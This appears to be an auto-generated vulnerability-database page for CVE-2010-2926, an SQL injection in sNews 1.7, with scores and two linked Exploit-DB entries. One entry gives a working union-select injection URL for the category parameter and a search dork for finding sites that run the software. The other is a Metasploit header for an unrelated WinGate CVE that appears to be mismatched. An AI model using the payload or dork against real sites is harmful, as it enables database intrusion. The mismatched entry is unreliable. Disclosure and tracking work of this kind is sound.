CVE-2010-2926
Published 2010-07-30
CVE-2010-2926: SQL injection vulnerability in index.php in sNews 1.7 allows remote attackers to execute arbitrary SQL commands via the category parameter.
Priority: P343 | Severity: high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.91% (55.4th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solucija | snews | — | — |
No detection rules found.
Exploit-DB
QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)
exploitdb · 2010-09-20 · CVE-2006-2926
---
```ruby
##
# $Id: qbik_wingate_wwwproxy.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
  'Description' => %q{
    This module exploits a stack buffer overflow in Qbik WinGate version
    6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the
    HTTP proxy service on port 80, a remote attacker could overflow
    a buffer and execute arbitrary code.
  },
  'Author' => 'patrick',
  'License' => MSF
```
Exploit-DB
sNews 1.7 - 'index.php?category' SQL Injection
exploitdb · 2010-07-24 · CVE-2010-2926
---
########################################################################################
sNews v1.7 (index.php?category) SQL Injection Vulnerability
########################################################################################
Author : CoBRa_21
Author Web Page : http://www.ipbul.org
Dork: "Powered by sNews"
########################################################################################
Sql Injection:
http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8
########################################################################################
Thanks http://e-banka.org & http://www.cyber-warrior.org
###################################################################################
No writeups or analysis indexed.
Published: 2010-07-30